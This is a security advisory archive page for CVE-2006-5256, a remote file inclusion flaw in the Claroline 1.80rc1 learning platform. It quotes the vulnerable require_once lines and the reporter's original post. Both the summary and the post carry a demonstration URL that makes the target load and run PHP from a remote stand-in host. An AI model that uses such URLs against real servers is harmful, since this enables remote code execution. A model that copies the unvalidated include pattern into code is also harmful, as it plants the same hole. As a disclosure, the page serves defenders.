SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Claroline Vendors:   Claroline.net
Claroline Include File Bug in 'inc/lib/import.lib.php' Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1017044
SecurityTracker URL:  http://securitytracker.com/id/1017044
CVE Reference:   CVE-2006-5256   (Links to External Site)
Updated:  Jun 2 2008
Original Entry Date:  Oct 11 2006
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.80rc1
Description:   A vulnerability was reported in Claroline. A remote user can include and execute arbitrary code on the target system.

The 'inc/lib/import.lib.php' file does not properly validate user-supplied input in the 'includePath' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/claroline180rc1/claroline/inc/lib/import.lib.php?includePath=http://shell/cmd.gif?

k1tk4t reported this vulnerability.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   The vendor has issued a fixed version (1.80) that does not contain the vulnerable file.

The fix is available at:

http://www.claroline.net/download.htm

Vendor URL:  www.claroline.net/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  claroline <= 180rc1 Remote File Inclusion

##################################################################################
# claroline <= 180rc1 Remote File Inclusion
# Download Source : http://www.claroline.net/dlarea/claroline180rc1.tar.gz
#
# Found By    : k1tk4t - k1tk4t[4t]newhack.org
# Location      : Indonesia   -- #newhack[dot]org 
########################################################################
file ;
claroline/inc/lib/import.lib.php
########################################################################
bugs ; begin line 8 
require_once ($includePath . '/claro_init_global.inc.php');
    require_once ($includePath . '/lib/export_zip.lib.php');
    require_once ($includePath . '/../wiki/lib/lib.createwiki.php');
    require_once ($includePath . '/lib/pclzip/pclzip.lib.php');
 require_once ($includePath . '/lib/fileManage.lib.php');
    require_once ($includePath . '/lib/forum.lib.php');
    require_once ($includePath . '/lib/import.xmlparser.lib.php');
    require_once ($includePath . '/lib/add_course.lib.inc.php');
 require_once ($includePath . '/lib/course.lib.inc.php');
 require_once ($includePath . '/lib/sendmail.lib.php');
    require $includePath.'/lib/debug.lib.inc.php';
########################################################################
exmple and methode exploit ;
http://localhost/claroline180rc1/claroline/inc/lib/import.lib.php?includePath=http://shell/cmd.gif?
########################################################################
Thanks;
str0ke
milw0rm
google
#e-c-h-o (all member echo community)
#nyubi (all member solpotcrew community)
person;
y3dips, lirva32, the_day,(&all echo staff) nyubi,x-ace,NoGe(asiahacker),ghoz, home_edition2001,matdhule, iFX, and for all (friend's&enemy)

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC